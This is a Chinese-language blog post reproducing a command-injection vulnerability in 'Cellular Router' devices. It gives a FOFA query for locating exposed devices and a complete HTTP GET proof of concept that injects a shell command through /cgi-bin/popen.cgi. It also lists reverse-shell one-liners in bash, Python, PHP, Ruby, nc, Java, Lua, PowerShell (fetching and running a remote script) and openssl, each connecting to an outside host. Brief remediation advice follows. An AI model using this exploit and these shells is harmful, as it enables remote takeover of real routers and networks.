移动路由器Cellular Router命令执行漏洞复现 [附POC]

news2024/12/26 11:00:31

文章目录

  • 移动路由器Cellular Router命令执行漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

移动路由器Cellular Router命令执行漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

移动路由器(Cellular Router)是一种网络设备,通常用于提供移动网络连接的路由和数据传输功能。它们通常使用蜂窝(Cellular)网络技术,如4G LTE或5G,来连接到互联网。移动路由器与传统的有线路由器不同,因为它们不依赖于固定的互联网连接,而是使用无线信号来访问网络。

0x03 影响版本

目前移动路由器Cellular Router全版本

0x04 漏洞环境

FOFA语法:title=“index” && header=“lighttpd/1.4.30”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /cgi-bin/popen.cgi?command=ping%20-c%204%20127.0.0.1;id&v=0.1303033443137912 HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

3.复现

返回包出现如下数据代表漏洞存在
在这里插入图片描述发现命令成功执行。可以将执行命令替换成自己要执行的命令即可

常用反弹shell命令

bash

bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done
python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444
加密shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s

0x06 修复建议

    
1. 输入验证和过滤
        对用户输入进行验证和过滤,确保只允许合法的输入字符和格式。
        不信任的输入数据应该经过适当的输入验证和过滤,例如,对于文件上传功能,应验证文件类型和大小。
        对于命令执行漏洞,不要直接将用户输入作为命令参数,而是使用参数化查询或类似的技术来将输入与命令参数分开。
2. 最小权限原则:
        将应用程序运行的进程和服务限制到最小权限,以减小攻击者可能获得的权限。
        避免使用超级用户或管理员权限来执行不必要的操作。
3.安全配置:
        确保服务器和应用程序的安全配置,包括对于不必要的服务和端口的关闭,以及安全的默认配置。
        移除或限制不必要的系统命令和工具的访问权限。
4.代码审查和漏洞扫描:
        定期进行代码审查,查找和修复潜在的漏洞,包括命令执行漏洞。
        使用漏洞扫描工具来自动发现和修复漏洞。
5.安全开发实践:
        遵循安全开发最佳实践,包括避免硬编码敏感信息,不要将密码明文存储在配置文件中,使用加密算法来存储敏感数据等。
        使用安全的编程语言和框架,并及时应用安全更新和补丁。
 6.限制外部输入:
        对于与外部系统的交互,例如通过API或文件上传,确保验证和授权用户访问。
        在可能的情况下,使用白名单来限制允许的操作和输入。



本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1152951.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java IDEA设置环境变量 以及代码获取

IDEA 设置环境变量 1.进入如图设置&#xff0c;一般的 java 程序和 spring Boot &#xff0c;还是tomcat 都可以从这里进入 2.可以在如下地方手动添加 3. tomcat 类 4.spring boot 类 代码获取指定值 假定我设置如下 代码则如下获取&#xff08;类均为JDK 自带类&…

AI虚拟直播系统源码 24小时直播不停歇 带完整搭建教程

近几年电商直播带货热潮持高不跌&#xff0c;很多商家企业都会选择线上直播卖产品&#xff0c;与此同时&#xff0c;虚拟主播开始盛行&#xff0c;与真人主播相比&#xff0c;品牌虚拟主播无档期风险、离职风险、人设稳定更可控。 虚拟主播的不是为了取代真人主播而开发&#…

重锤式体电阻测试仪应用在什么领域?有什么作用?

重锤式体电阻测试仪是一种用于测量物体电阻的仪器&#xff0c;主要应用于以下几个领域&#xff1a; 电力工业&#xff1a;在电力系统中&#xff0c;重锤式体电阻测试仪可以用于测试电缆、变压器、开关设备等电气设备的电阻值&#xff0c;以确保它们的运行正常。 电子工业&…

AI集成ChatGPT敲代码神器Copilot

&#x1f4d1;前言 本文主要是AI工具Copilot解读文章&#xff0c;如果有什么需要改进的地方还请大佬指出⛺️ &#x1f3ac;作者简介&#xff1a;大家好&#xff0c;我是青衿&#x1f947; ☁️博客首页&#xff1a;CSDN主页放风讲故事 &#x1f304;每日一句&#xff1a;努力…

最新彩虹云商城系统源码/孤傲电商云商城系统源码/在线购物商场视觉源码+自助下单+独立后台

源码简介&#xff1a; 最新彩虹云商城系统源码&#xff0c;孤傲电商云商城系统源码&#xff0c;它是在线购物商场视觉源码&#xff0c;有很好的视觉购物享受&#xff0c;它还有独立管理后台。 孤傲云商城系统是一款功能丰富的电子商务平台&#xff0c;而彩虹云商城系统plus史…

Python的web自动化学习(五)Selenium的隐式等待(元素定位)

引言&#xff1a; WebDriver隐式等待是一种全局性的等待方式&#xff0c;它会在查找元素时设置一个固定的等待时间。当使用隐式等待时&#xff0c;WebDriver会在查找元素时等待一段时间&#xff0c;如果在等待时间内找到了元素&#xff0c;则立即执行下一步操作&#xff1b;如果…

倾斜摄影三维模型的根节点合并注意事项浅析

倾斜摄影三维模型的根节点合并注意事项浅析 倾斜摄影三维模型的根节点合并是构建高精度、真实感和稳定性的三维模型的关键步骤之一。在进行根节点合并时&#xff0c;需要注意以下几个重要的事项&#xff0c;以确保合并的准确性和可靠性。 首先&#xff0c;准确的相机标定是进行…

5000元高端投影仪双十一怎么选?极米H6 4K高亮定焦版成为首选

随着人们对生活品质越来越高的追求&#xff0c;更多的年轻人开始选择以投影仪取代传统电视。但当下国内外市场上的投影仪品牌和型号众多&#xff0c;如果预算在5000元左右&#xff0c;应该选择哪一款投影仪呢&#xff1f;大家如果不知如何选择&#xff0c;不妨试试极米科技近期…

Shadingsphere proxy 启动报错 Windows

Exception in thread "main" java.lang.NoClassDefFoundError 本来打算在本地电脑测试一下proxy的功能&#xff0c;使用的二进制安装包&#xff0c;没想到怎么都启动不起来&#xff0c;一直报找不到某个类的错误。我还以为是自身的配置有问题&#xff0c;等我copy了…

HCIE怎么系统性学习?这份HCIE学习路线帮你解决

华为认证体系覆盖ICT行业十一个技术领域共十三个技术方向的认证&#xff0c;今天我们分享的是其中最热门的数据通信方向的HCIE学习路线。 HCIE是华为认证体系中最高级别的ICT技术认证 &#xff0c;旨在打造高含金量的专家级认证&#xff0c;为技术融合背景下的ICT产业提供新的能…

淘宝价格监控-电商数据采集分析

一、什么是淘宝商品数据采集&#xff1f; 淘宝商品数据采集&#xff0c;顾名思义&#xff0c;就是通过技术手段对全网电商平台上的商品价格信息进行抓取并保存。通过将收集到的这些价格信息进行分析处理后得到该商品的成交价、折扣率等关键属性指标&#xff0c;从而为卖家提供…

C9对接板总成的核心组成部分及各自的应用场景

格雷希尔GripSeal针对一些新能源汽车行业设备集成商和终端客户的测试需求&#xff0c;逐步完善C9对接板总成的各个组成部分&#xff0c;为各种测试需求如&#xff1a;EOL测试、DCR测试、气密性测试等提供灵活的多品种共线方案。   C9对接板总成的构成图 我们的C9对接板总成的…

批量拍摄剪辑短视频,这几个实用又简单的拍摄技巧可以收藏学习

现在越来越多的朋友都当起了视频博主&#xff0c;自己来拍短视频&#xff0c;但说来简单&#xff0c;到了拍摄的时候&#xff0c;却有些无从下手&#xff0c;直接拿起手机就拍吗&#xff1f;是不是太平淡了&#xff1f;可自己又不会专业的拍摄技巧啊~ 今天来分享4个简单的拍摄…

基于本体的军事术语知识图谱构建方法

源自&#xff1a; 智汇杰瑞 “人工智能技术与咨询” 发布 摘要 1 军事术语知识图谱构建流程 ※ ※ ※ ※ ※ ※ ※ ※ ※ ※ ※ ※ 图1 军事术语知识图谱构建流程 2 军事术语本体构建 2.1 军事术语数据结构分析 2.2 军事术语本体设计 ※ ※ ※ ※ ※ ※ ※ ※…

【原创】java+swing+mysql志愿者管理系统设计与实现

摘要&#xff1a; 志愿者管理系统是一个用于管理志愿者以及活动报名的系统&#xff0c;提高志愿者管理的效率&#xff0c;同时为志愿者提供更好的服务和体验。本文主要介绍如何使用javaswingmysql去实现一个志愿者管理系统。 功能分析&#xff1a; 系统主要提供给管理员和志…

MySQL -- 表的增删查改

MySQL – 表的增删查改 文章目录 MySQL -- 表的增删查改一、Create创建1.插入数据2.插入否则更新3.替换 二、Retrieve查找1.select列1.1.全列查询1.2.指定列查询1.3.查询字段为表达式1.4.为查询结果指定别名1.5.结果去重 2.where条件2.1.英语不及格的同学&#xff08;英语<6…

视频内容不错为什么数据不好?批量制作优质视频的软件推荐

很多时候&#xff0c;在别人账号上爆了的内容&#xff0c;我们做了复刻发布后&#xff0c;却依旧没有很好的流量。一般来说&#xff0c;造成这个问题的原因很可能是没有做好运营或者SEO优化。 下面让我们来具体看看 1、没有做好运营 账号与流量是需要运营的&#xff0c;即便…

Pytorch 文本情感分类案例

一共六个脚本,分别是: ①generateDictionary.py用于生成词典 ②datasets.py定义了数据集加载的方法 ③models.py定义了网络模型 ④configs.py配置一些参数 ⑤run_train.py训练模型 ⑥run_test.py测试模型 数据集https://download.csdn.net/download/Victor_Li_/88486959?spm1…

可视化文件编辑与SSH传输神器WinSCP如何公网远程访问本地服务器

&#x1f525;博客主页&#xff1a; 小羊失眠啦. &#x1f3a5;系列专栏&#xff1a;《C语言》 《数据结构》 《Linux》《Cpolar》 ❤️感谢大家点赞&#x1f44d;收藏⭐评论✍️ 可视化文件编辑与SSH传输神器WinSCP如何公网远程本地服务器 文章目录 可视化文件编辑与SSH传输神…

如何在 Photoshop 中使用污点修复画笔

学习污点修复画笔工具的基础知识&#xff0c;以及如何使用它来修复、平滑和删除图像中不需要的部分 1.如何在 Photoshop 中使用污点修复画笔 步骤1 在 Photoshop 中使用污点修复画笔的方法有很多。今天&#xff0c;让我们用它来去除这只手臂上的一些较小的纹身。 步骤2 在我…